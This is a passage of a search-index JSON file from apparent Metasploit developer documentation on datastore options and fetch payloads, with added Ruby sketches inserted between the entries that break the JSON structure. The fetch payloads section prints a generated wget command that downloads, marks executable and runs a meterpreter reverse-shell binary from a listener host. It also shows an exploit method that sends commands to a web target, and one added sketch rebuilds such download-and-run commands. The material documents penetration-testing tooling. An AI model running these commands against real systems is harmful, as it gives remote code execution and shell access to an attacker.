    "content": "For an input that’s meant to be used as a port number. This number should be between 0 and 65535. Code example: . OptPort.new('RPORT', [ true, 'Set a port', 21 ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optport",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optport"
  },"329": {
    "doc": "How to use datastore options",
    "title": "OptRaw",
    "content": "It actually functions exactly the same as OptString. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optraw",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optraw"
  },"330": {
    "doc": "How to use datastore options",
    "title": "OptRegexp",
    "content": "The datastore option is a regular expression. Code example: . OptRegexp.new('PATTERN', [true, 'Match a name', '^alien']) . Other types: . In some cases, there might not be a well-suited datastore option type for you. The best example is a URL: even though there’s no such thing as an OptUrl, what you can do is use the OptString type and then do some validation for it in your module, like this: . def valid?(input) if input =~ /^http:\\/\\/.+/i return true else # Here you can consider raising OptionValidateError return false end end if valid?(datastore['URL']) # We can do something with the URL else # Not the format we're looking for. Refuse to do anything. end . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optregexp",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optregexp"
  },"331": {
    "doc": "How to use datastore options",
    "title": "OptString",
    "content": "Typically for a string option. If the input begins with “file://”, OptString will also automatically assume this is a file, and read from it. However, there is no file path validation when this happens, so if you want to load a file, you should use OptPath instead, and then read the file yourself. Code example: . OptString.new('MYTEST', [ true, 'Set a MYTEST option', 'This is a default value' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optstring",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optstring"
  },"332": {
    "doc": "How to use datastore options",
    "title": "Registering and deregistering module options",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#registering-and-deregistering-module-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#registering-and-deregistering-module-options"
  },"333": {
    "doc": "How to use datastore options",
    "title": "The register_options method",
    "content": "The register_options method can register multiple basic datastore options. Basic datastore options are the ones that either must be configured, such as the RHOST option in a server-side exploit, or are very commonly used, such as the various username/password options found in a login module. The following is an example of registering multiple datastore options in a module: . register_options( [ OptString.new('SUBJECT', [ true, 'Set a subject' ]), OptString.new('MESSAGE', [ true, 'Set a message' ]) ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_options-method"
  },"334": {
    "doc": "How to use datastore options",
    "title": "The register_advanced_options method",
    "content": "The register_advanced_options method can register multiple advanced datastore options. Advanced datastore options are the ones that the user never needs to configure before using the module. For example, the Proxies option is almost always considered “advanced”. But it can also mean something that most users will find difficult to configure. An example of registering an advanced option: . register_advanced_options( [ OptInt.new('Timeout', [ true, 'Set a timeout, in seconds', 60 ]) ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_advanced_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_advanced_options-method"
  },"335": {
    "doc": "How to use datastore options",
    "title": "The deregister_options method",
    "content": "The deregister_options method removes either basic or advanced options. Usage is straightforward: . deregister_options('OPTION1', 'OPTION2', 'OPTION3') . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-deregister_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-deregister_options-method"
  },"336": {
    "doc": "How to use datastore options",
    "title": "Changing the default value for a datastore option",
    "content": "When a datastore option is already registered by a mixin, there are still ways to change its default value from the module. You can either call register_options again, or add a DefaultOptions key to the module’s metadata. Using the DefaultOptions key is preferred because the option’s description and other attributes remain unchanged. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#changing-the-default-value-for-a-datastore-option",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#changing-the-default-value-for-a-datastore-option"
  },"337": {
    "doc": "How to use datastore options",
    "title": "Using register_options to change the default value",
    "content": "One advantage of using register_options is that if the datastore option is advanced, re-registering it moves it to the basic option menu, so that when people run “show options” in msfconsole the option is listed there instead. This method also lets you change the option’s description and whether it is required. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-register_options-to-change-the-default-value",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-register_options-to-change-the-default-value"
  },"338": {
    "doc": "How to use datastore options",
    "title": "Using DefaultOptions to change the default value",
    "content": "When Metasploit initializes a module, an import_defaults method is called. This method will update all existing datastore options (which is why register_options can be used to update default values), and then it will specifically check the DefaultOptions key from the module’s metadata, and update again. Here’s an example of an exploit module’s initialize portion with the DefaultOptions key: . def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Module name', 'Description' =&amp;gt; %q{ This is an example of setting the default value of RPORT using the DefaultOptions key }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Name' ], 'References' =&amp;gt; [ [ 'URL', '' ] ], 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'Windows', { 'Ret' =&amp;gt; 0x41414141 } ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'DefaultOptions' =&amp;gt; { 'RPORT' =&amp;gt; 8080 }, 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '', 'DefaultTarget' =&amp;gt; 0 ) ) end . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-defaultoptions-to-change-the-default-value",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-defaultoptions-to-change-the-default-value"
  },"339": {
    "doc": "How to use datastore options",
    "title": "Modifying datastore options at run-time",
    "content": "Currently, the safest way to modify a datastore option at run-time is to override a method. For example, some mixins retrieve the RPORT option like this: . def rport datastore['RPORT'] end . In that scenario, you can override this rport method from your module, and return a different value: . def rport 80 end . This way, when a mixin wants that information, it will end up with the value 80, and not whatever is actually in datastore['RPORT']. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#modifying-datastore-options-at-run-time",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#modifying-datastore-options-at-run-time"
  },"340": {
    "doc": "How to use datastore options",
    "title": "Ideal datastore naming",
    "content": "Normal options are always UPPERCASE, advanced options are CamelCase, advanced options with a similar purpose are Prefixed::CamelCase. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#ideal-datastore-naming",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#ideal-datastore-naming"
  },"341": {
    "doc": "How to use datastore options",
    "title": "Renaming datastore options",
    "content": "Options can be renamed and retain backward compatibility by using the aliases: keyword argument in the new option. For example, to rename OldOption to NewOption, the new definition would look something like: . OptString.new('NewOption', [true, 'A (sort of) new option', 'hello'], aliases: %w[ OldOption ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#renaming-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#renaming-datastore-options"
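The following stand-alone Ruby sketch is an added example, not code from Metasploit Framework: it models how register_options, register_advanced_options, deregister_options, the DefaultOptions metadata key and option aliases interact, using a toy Datastore class in place of the real module/datastore machinery. The mixin registrations (RPORT at 80, Proxies), the module's own options and the Proxies value format are constructed for illustration.

```ruby
# Added example (not Metasploit's own code): a toy model of datastore
# option registration. Option attributes follow the [required, description,
# default] array used by the real OptString/OptInt constructors.
class Opt
  attr_accessor :name, :required, :desc, :default, :advanced, :aliases

  def initialize(name, attrs, aliases: [])
    @name = name
    @required, @desc, @default = attrs
    @aliases = aliases
    @advanced = false
  end
end
class OptString < Opt; end
class OptInt < Opt; end

class Datastore
  attr_reader :options

  def initialize(info = {})
    @options = {}   # canonical name => Opt
    @aliases = {}   # old name => canonical name
    @values  = {}   # values a user has set
    @info    = info # module metadata, for the DefaultOptions key
  end

  # Re-registering a name replaces the whole definition (description,
  # required flag, default) and puts the option on the basic menu.
  def register_options(opts)
    opts.each { |o| o.advanced = false; add(o) }
  end

  def register_advanced_options(opts)
    opts.each { |o| o.advanced = true; add(o) }
  end

  def deregister_options(*names)
    names.each do |n|
      canon = resolve(n)
      next unless canon
      @aliases.delete_if { |_, target| target == canon }
      @options.delete(canon)
    end
  end

  # Mirrors the import_defaults step: DefaultOptions changes only the
  # default value and leaves the mixin's description and required flag alone.
  def import_defaults
    (@info['DefaultOptions'] || {}).each do |name, value|
      canon = resolve(name)
      raise ArgumentError, "DefaultOptions names unknown option #{name}" unless canon
      @options[canon].default = value
    end
  end

  def []=(name, value)
    canon = resolve(name)
    raise ArgumentError, "unknown option #{name}" unless canon
    @values[canon] = value
  end

  def [](name)
    canon = resolve(name)
    return nil unless canon
    @values.fetch(canon) { @options[canon].default }
  end

  # What `show options` lists, versus `show advanced`.
  def basic
    @options.values.reject(&:advanced).map(&:name).sort
  end

  def advanced
    @options.values.select(&:advanced).map(&:name).sort
  end

  # Required options with neither a user value nor a default: the check
  # that would stop `run` with a missing-option error.
  def missing_required
    @options.values.select { |o| o.required && self[o.name].nil? }.map(&:name)
  end

  private

  def add(opt)
    @options[opt.name] = opt
    opt.aliases.each { |a| @aliases[a] = opt.name }
  end

  def resolve(name)
    @options.key?(name) ? name : @aliases[name]
  end
end

# Constructed scenario: an HTTP-style mixin registers RPORT (basic, 80) and
# Proxies (advanced); the module then adds its own options, renames
# OldOption to NewOption with an alias, and bumps RPORT via DefaultOptions.
def build_module
  ds = Datastore.new('DefaultOptions' => { 'RPORT' => 8080 })
  ds.register_options([OptInt.new('RPORT', [true, 'The target port', 80])])
  ds.register_advanced_options([OptString.new('Proxies', [false, 'A proxy chain'])])
  ds.register_options([
    OptString.new('SUBJECT', [true, 'Set a subject']),
    OptString.new('NewOption', [true, 'A (sort of) new option', 'hello'], aliases: %w[OldOption])
  ])
  ds.register_advanced_options([OptInt.new('Timeout', [true, 'Set a timeout, in seconds', 60])])
  ds.import_defaults
  ds
end
```

Calling build_module and then inspecting basic, advanced, missing_required and the value of RPORT shows the two routes side by side: DefaultOptions leaves the mixin's description intact while changing the default to 8080, whereas re-registering Proxies with register_options would replace its definition and move it onto the basic menu.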
  },"342": {
    "doc": "How to use datastore options",
    "title": "Filtering datastore options",
    "content": "Options can be hidden in certain conditions using the conditions: keyword argument to their definition. This allows options to be hidden when they are not relevant based on the value of another option, the selected target or the selected action. The syntax for a condition is *thing* *operator* *value*. | thing - One of ACTION, TARGET or the name of a datastore option. | operator - One of ==, !=, in, nin. In the case of in and nin (not-in), the value is an array of values. | value - The value to check for in the condition. | . When the condition evaluates to true, the option is considered active and displayed to the user. Datastore options with no defined conditions are active by default. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filtering-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filtering-datastore-options"
  },"343": {
    "doc": "How to use datastore options",
    "title": "Filter examples",
    "content": ". | conditions: %w[VERSION == 5] - Active when the VERSION datastore option is 5. | conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]] - Active when the ACTION is one of SSRF, EXEC or SECSTORE. | . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filter-examples",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filter-examples"
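As an added illustration, not Framework's own condition evaluator, the following stand-alone Ruby re-implements the thing/operator/value semantics described in the two sections above and applies them to a constructed set of option definitions. It compares values as strings, an assumption made so that an integer VERSION of 5 matches %w[VERSION == 5]; the option names other than those quoted above (RHOSTS, LEGACY_URI, MODERN_URI, TARGETURI, LHOST) are invented for the example.

```ruby
# Added example (not Metasploit's code): evaluate `conditions:` filters of
# the form [thing, operator, value], where thing is ACTION, TARGET or a
# datastore option name and operator is one of ==, !=, in, nin.
OPERATORS = %w[== != in nin].freeze

# conditions may be nil/empty (always active), a flat array such as
# %w[VERSION == 5], or an array whose third element is a list for in/nin.
def condition_active?(conditions, datastore:, action: nil, target: nil)
  return true if conditions.nil? || conditions.empty?

  thing, op, value = conditions
  raise ArgumentError, "unsupported operator #{op.inspect}" unless OPERATORS.include?(op)

  actual =
    case thing
    when 'ACTION' then action
    when 'TARGET' then target
    else datastore[thing]
    end
  # Assumption: compare as strings so OptInt values match %w[...] literals.
  actual = actual.to_s unless actual.nil?
  candidates = Array(value).map(&:to_s)

  case op
  when '=='  then actual == candidates.first
  when '!='  then actual != candidates.first
  when 'in'  then candidates.include?(actual)
  when 'nin' then !candidates.include?(actual)
  end
end

# Given {option name => conditions}, return the names that should be shown
# for the current datastore values, action and target.
def active_options(defs, datastore:, action: nil, target: nil)
  defs.select do |_, conds|
    condition_active?(conds, datastore: datastore, action: action, target: target)
  end.keys
end

# Constructed module: a VERSION option and an ACTION, with options that are
# only meaningful for some of their values.
EXAMPLE_DEFS = {
  'RHOSTS'     => nil,
  'VERSION'    => nil,
  'LEGACY_URI' => %w[VERSION == 5],
  'MODERN_URI' => %w[VERSION != 5],
  'TARGETURI'  => ['ACTION', 'in', %w[SSRF EXEC SECSTORE]],
  'LHOST'      => ['ACTION', 'nin', %w[SSRF]]
}.freeze
```

With VERSION set to 5 and ACTION SSRF the visible set is RHOSTS, VERSION, LEGACY_URI and TARGETURI; switching to VERSION 6 and an action outside the list swaps those for MODERN_URI and LHOST. An unknown operator raises rather than silently hiding or showing the option, which is the behaviour you want from a filter that decides what a user is asked to configure.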
  },"344": {
    "doc": "How to use datastore options",
    "title": "How to use datastore options",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html"
  },"345": {
    "doc": "How to use Fetch Payloads",
    "title": "Fetch Payloads",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#fetch-payloads",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#fetch-payloads"
  },"346": {
    "doc": "How to use Fetch Payloads",
    "title": "What Are Fetch Payloads?",
    "content": "Fetch payloads are adapted, command-based payloads that use network-enabled binaries on a remote host to download binary payloads to that host. Adapted payloads are payloads where we have bolted an extra feature on top of an existing payload to modify its behavior. In this case, you can still use all your favorite binary payloads and transports, but an optional fetch payload adapter stages them using a networking binary on the target and a server in Framework. They function similarly to some Command Stagers, but live on the payload side rather than the exploit side to simplify integration and portability. Fetch payloads are a fast, easy way to get a session on a target that has a command injection or code execution vulnerability and a known binary able to download and store a file. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#what-are-fetch-payloads",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#what-are-fetch-payloads"
  },"347": {
    "doc": "How to use Fetch Payloads",
    "title": "Terminology",
    "content": "In the following documentation, it is useful to agree on certain terms so that the text does not become confusing. . | Fetch Payload - The command to execute on the remote host to retrieve and execute the Served Payload. | Fetch Binary - The binary we are using on the remote host to download the Served Payload. Examples might be WGET, cURL, or Certutil. | Fetch Protocol - The protocol used to download the served payload, for example HTTP, HTTPS or TFTP. | Fetch Listener - The server hosting the served payload. | Fetch Handler - The same as Fetch Listener. | Served Payload - The underlying payload we want to execute. We also might call this the Adapted Payload. | Served Payload Handler - The handler for the served payload. This is just the standard handler for a payload like meterpreter/reverse_tcp or shell_reverse_tcp. | . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#terminology",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#terminology"
  },"348": {
    "doc": "How to use Fetch Payloads",
    "title": "Organization",
    "content": "Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support HTTP, HTTPS, and TFTP servers. Once you select a fetch payload, you can select the binary you’d like to run on the remote host to download the served payload prior to execution. Here is the naming convention for fetch payloads: &amp;lt;cmd&amp;gt;/&amp;lt;platform&amp;gt;/&amp;lt;fetch protocol&amp;gt;/served_payload For example: cmd/linux/https/x64/meterpreter/reverse_tcp Will do four things: . | Create a linux/x64/meterpreter/reverse_tcp elf binary to be the served payload. | Serve the above served payload on an HTTPS server | Start a served payload handler for the served payload to call back to | Generate a command to execute on a remote host that will download the served payload and run it. | . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#organization",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#organization"
  },"349": {
    "doc": "How to use Fetch Payloads",
    "title": "A Simple Stand-Alone Example",
    "content": "The fastest way to understand Fetch Payloads is to use them and examine the output. For example, let’s assume a Linux target with the ability to connect back to us with an HTTP connection and a command execution vulnerability. First, let’s look at the payload in isolation: . msf6 exploit(multi/ssh/sshexec) &amp;gt; use payload/cmd/linux/http/x64/meterpreter/reverse_tcp msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; show options Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_FILENAME YXeSdwsoEfOH no Name to use on remote system when storing payload FETCH_SRVHOST 0.0.0.0 yes Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR yes Remote writable dir to store payload LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port View the full module info with the info, or info -d command. msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . Options . FETCH_COMMAND is the binary we wish to run on the remote host to download the adapted payload. Currently, the supported options are CURL FTP TFTP TNFTP WGET on Linux hosts and CURL TFTP CERTUTIL on Windows hosts. We’ll get into more details on the binaries later. FETCH_FILENAME is the name you’d like the executable payload saved as on the remote host. This option is not supported by every binary and must end in .exe on Windows hosts. The default value is random. FETCH_SRVHOST is the IP where the server will listen. FETCH_SRVPORT is the port where the server will listen. FETCH_URIPATH is the URI corresponding to the payload file. 
The default value is deterministic based on the underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying served payload is the same. FETCH_WRITABLE_DIR is the directory on the remote host where we’d like to store the served payload prior to execution. This value is not supported by all binaries. If you set this value and it is not supported, it will generate an error. The remaining options will be the options available to you in the served payload; in this case our served payload is linux/x64/meterpreter/reverse_tcp so our only added options are LHOST and LPORT. If we had selected a different payload, we would see different options. Generating the Fetch Payload . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_COMMAND WGET FETCH_COMMAND =&amp;gt; WGET msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_SRVHOST 10.5.135.201 FETCH_SRVHOST =&amp;gt; 10.5.135.201 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set FETCH_SRVPORT 8000 FETCH_SRVPORT =&amp;gt; 8000 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set LHOST 10.5.135.201 LHOST =&amp;gt; 10.5.135.201 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; set LPORT 4567 LPORT =&amp;gt; 4567 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; generate -f raw wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &amp;amp; msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . You can see the fetch payload generated: wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &amp;amp; This command downloads the served payload, marks it as executable, and then executes it on the remote host. Starting the Fetch Server . 
When you start the Fetch Handler, it starts both the server hosting the binary payload and the listener for the served payload. With verbose set to true, you can see both the Fetch Handler and the Served Payload Handler are started: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &amp;amp; [*] Payload Handler Started as Job 0 [*] Fetch Handler listening on 10.5.135.201:8000 [*] http server started [*] Started reverse TCP handler on 10.5.135.201:4567 . Fetch Handlers and Served Payload Handlers . The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under Jobs, even though the Fetch Handler is listening: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; jobs -l Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; netstat -ant | grep 8000 [*] exec: netstat -ant | grep 8000 tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN . Killing the Served Payload handler will kill the Fetch Handler as well: . msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; jobs -k 0 [*] Stopping the following job(s): 0 [*] Stopping job 0 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; netstat -ant | grep 8000 [*] exec: netstat -ant | grep 8000 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &amp;gt; . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#a-simple-stand-alone-example",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#a-simple-stand-alone-example"
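To make the FETCH_* options concrete, here is an added stand-alone Ruby sketch (not Framework's own payload adapter) that rebuilds the two commands shown in the transcripts on this page from their options and enforces the constraints described in the text: the .exe suffix on Windows, and the port 69 / empty directory / empty filename rule for the stock tftp client covered under Supported Commands. Only the WGET (Linux) and CURL (Windows) forms that actually appear on this page are modelled; the random filename lengths are a guess.

```ruby
# Added example, not Framework's generator: rebuild fetch commands from the
# FETCH_* options and validate the constraints the documentation describes.
require 'securerandom'

LINUX_FETCH_BINARIES   = %w[CURL FTP TFTP TNFTP WGET].freeze
WINDOWS_FETCH_BINARIES = %w[CURL TFTP CERTUTIL].freeze

# Build the command the target will run. Only the WGET (Linux) and CURL
# (Windows) forms visible in the transcripts are modelled here.
def fetch_command(platform:, fetch_command:, protocol:, srvhost:, srvport:,
                  uripath:, filename: nil, writable_dir: nil)
  binary = fetch_command.to_s.upcase
  url    = "#{protocol.to_s.downcase}://#{srvhost}:#{srvport}/#{uripath}"

  case platform
  when :linux
    unless LINUX_FETCH_BINARIES.include?(binary)
      raise ArgumentError, "#{binary} is not a supported Linux fetch binary"
    end
    file = filename || SecureRandom.alphanumeric(12)           # length is a guess
    path = writable_dir.to_s.empty? ? "./#{file}" : "#{writable_dir}/#{file}"
    download =
      case binary
      when 'WGET' then "wget -qO #{path} #{url}"
      when 'CURL' then "curl -so #{path} #{url}"
      else raise NotImplementedError, "#{binary} is not modelled in this sketch"
      end
    # download, mark executable, run in the background so the shell returns
    "#{download}; chmod +x #{path}; #{path} &"
  when :windows
    unless WINDOWS_FETCH_BINARIES.include?(binary)
      raise ArgumentError, "#{binary} is not a supported Windows fetch binary"
    end
    file = filename || "#{SecureRandom.alphanumeric(11)}.exe"  # length is a guess
    raise ArgumentError, 'FETCH_FILENAME must end in .exe on Windows' unless file.end_with?('.exe')
    path = writable_dir.to_s.empty? ? file : "#{writable_dir}\\#{file}"
    download =
      case binary
      when 'CURL' then "curl -so #{path} #{url}"
      else raise NotImplementedError, "#{binary} is not modelled in this sketch"
      end
    # cmd.exe: `&` runs the next command unconditionally; start /B detaches it
    "#{download} & start /B #{path}"
  else
    raise ArgumentError, "unknown platform #{platform.inspect}"
  end
end

# The stock tftp client can set neither the port nor the destination name,
# so the text requires FETCH_SRVPORT 69 and empty FETCH_WRITABLE_DIR and
# FETCH_FILENAME. Returns the list of violations (empty when valid).
def tftp_binary_errors(srvport:, writable_dir:, filename:)
  errors = []
  errors << 'FETCH_SRVPORT must be 69 for the tftp binary' unless srvport.to_i == 69
  errors << 'FETCH_WRITABLE_DIR must be empty for the tftp binary' unless writable_dir.to_s.empty?
  errors << 'FETCH_FILENAME must be empty for the tftp binary' unless filename.to_s.empty?
  errors
end
```

Feeding the sketch the options from the transcript above (WGET, HTTP, 10.5.135.201:8000, the shown URI and filename) reproduces the exact wget command msfconsole generated, and the Windows case reproduces the curl-over-TFTP command from the Supported Commands section; a Windows filename without .exe, or a tftp-client configuration on a port other than 69, is rejected before anything is sent to the target.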
  },"350": {
    "doc": "How to use Fetch Payloads",
    "title": "Using Fetch Payloads on the Fly",
    "content": "One really nice thing about Fetch Payloads is that they let you execute a binary payload very quickly, without relying on a session in Framework or having to get a payload onto the target yourself. If you have a shell session, or even an odd situation where you can merely execute commands, you can get a session in Framework quickly without uploading a payload manually. Just follow the steps above and run the provided command. Right now, the only thing we serve is Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-fetch-payloads-on-the-fly",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-fetch-payloads-on-the-fly"
  },"351": {
    "doc": "How to use Fetch Payloads",
    "title": "Using it in an exploit",
    "content": "Using Fetch Payloads is no different from using any other command payload. First, give users access to the Fetch payloads for a given platform by adding a target that supports ARCH_CMD and the desired platform, either windows or linux. Once the target has been added, you can obtain the command by invoking payload.encoded and use it as the command to execute on the remote target. Example paired with CmdStager . There is likely to be some overlap between fetch payloads and command stagers. Let’s talk briefly about how to support both in an exploit. Please see the documentation on Command Stagers for the required imports and the specifics of command stagers. Here I am only documenting the changes needed so that fetch payloads work alongside command stagers, or so that fetch payloads can be used in the style of command stagers, which I suggest you do. In this case, I’ve modified the code provided in the command stager documentation to support both linux and unix command payloads. All I did was give an array value for the Platform key and change the Type to something more generic: . 'Targets' =&amp;gt; [ [ 'Linux Command', { 'Arch' =&amp;gt; [ ARCH_CMD ], 'Platform' =&amp;gt; [ 'unix', 'linux' ], 'Type' =&amp;gt; :nix_cmd } ] ] . For the execute_command method, nothing changes: . def execute_command(cmd, _opts = {}) populate_values if @sid.nil? || @token.nil? uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; normalize_uri(uri), 'cookie' =&amp;gt; 'sid=' + @sid, 'ctype' =&amp;gt; 'application/x-www-form-urlencoded', 'encode_params' =&amp;gt; true, 'vars_post' =&amp;gt; { 'token' =&amp;gt; @token, 'text' =&amp;gt; cmd, 'hhook' =&amp;gt; 'exec', 'sid' =&amp;gt; @sid } }) end . The only change in the exploit method is the use of the more generic Type value in the case statement. Nothing else needs to change. 
def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") case target['Type'] when :nix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end . If you have an exploit that already supports Unix Command payloads and you’d like it to support Linux Command payloads like Fetch Payloads, you can simply add the linux value to the platform array: . 'Nix Command', { 'Platform' =&amp;gt; [ 'unix', 'linux' ], 'Arch' =&amp;gt; ARCH_CMD, 'Type' =&amp;gt; :unix_cmd, } . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-it-in-an-exploit",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-fetch-payloads.html#using-it-in-an-exploit"
  },"352": {
    "doc": "How to use Fetch Payloads",
    "title": "Supported Commands",
    "content": "Windows And Linux Both . CURL . cURL comes pre-installed on Windows 10 and 11, is incredibly common on Linux platforms, and its options are very standardized across releases and platforms. This makes cURL a good default choice for both Linux and Windows targets. All options and server protocol types are supported by the cURL command. TFTP . The TFTP binary is useful only in edge cases because of a long list of limitations: 1) It is a Windows feature, but it is turned off by default on Windows Vista and later. 2) While you are likely to find it on Linux and Unix hosts, the options are not standard across releases. 3) The TFTP binary included in many Linux systems and all Windows systems allows neither the port nor the destination filename to be configured, so FETCH_SRVPORT must always be set to 69 and FETCH_WRITABLE_DIR and FETCH_FILENAME must be empty. Listening on port 69 in Framework can be problematic (it is a privileged port), so I suggest that you use the advanced option FetchListenerBindPort to start the server on a different port and redirect the connection to that high port with a tool like iptables. For example, on a Linux host with iptables, the following commands redirect UDP port 69 to UDP port 3069: sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069 sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069 Then set FetchListenerBindPort to 3069 and the callback will arrive correctly. 4) Because TFTP is a UDP-based protocol, and because of the way the server is implemented within Framework, each time you start a tftp fetch handler a new service is started: . 
